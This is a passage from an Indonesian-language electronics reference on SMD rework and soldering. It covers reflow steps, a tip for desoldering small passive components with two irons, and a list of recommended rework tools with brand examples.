3. Place IC, konfirmasi alignment
4. Reflow dengan hot air atau via iron drag💡 Tips Lab
Untuk desoldering SMD pasif (resistor, capasitor 0402/0603) tanpa hot air: sentuh kedua ujung komponen dengan dua iron tip secara bersamaan — komponen langsung terangkat. Teknik ini tidak bisa dengan satu iron. Alternatif: putus komponen dengan cutter lalu bersihkan pad secara terpisah.
Alat Rework Essential
Wajib
Soldering Station
Hakko FX-888D atau Weller WE1010. Jangan pakai iron tanpa temperature control.
Wajib
Hot Air Rework
Yihua 858D atau Quick 861DW. Wajib untuk SMD QFP/QFN, BGA rework.
Penting
Solder Wick
Desoldering braid — wajib untuk membersihkan bridge dan pad. Beli beberapa ukuran.
Penting
Flux No-Clean
Amtech NC-559-V2 atau MG Chemicals 835-P. Kunci untuk hasil solder berkualitas.
Penting
Microscope / Loupe
40× stereo microscope atau USB microscope camera. Krusial untuk SMD 0402 dan fine pitch.
Support
PCB Holder / Vise
Panavise atau third-hand holder. Bebaskan tangan untuk iron + tweezer.
ELEKTRONIKA KOMPREHENSIF — Blue Dragon Security Reference v1.0
Hardware · PCB · Hacking · Robotika
Hardware · PCB · Hacking · Robotika